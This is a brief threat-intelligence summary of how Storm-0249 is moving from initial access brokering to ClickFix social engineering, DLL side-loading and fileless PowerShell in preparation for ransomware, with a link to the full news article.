Storm-0249 is shifting from initial access provisioning to more sophisticated tactics like domain spoofing, DLL side-loading, and fileless PowerShell execution to facilitate ransomware attacks. These methods enable stealthy infiltration, persistence, and exploitation of trust in signed processes, potentially aiding ransomware groups such as LockBit and ALPHV. #Storm0249 #SentinelOne #LockBit #ALPHV #C2
Keypoints
- Storm-0249 is evolving from an initial access broker to deploying advanced attack techniques.
- The threat actor uses social engineering tactics like ClickFix to trick targets into executing malicious commands.
- Attacks leverage legitimate Windows utilities and signed processes to stay undetected.
- Malicious activities include deploying fileless PowerShell scripts and trojanized DLLs for persistence.
- The goal of these tactics is to prepare for ransomware attacks by tying encryption to system identifiers like MachineGuid.
Read More: https://thehackernews.com/2025/12/storm-0249-escalates-ransomware-attacks.html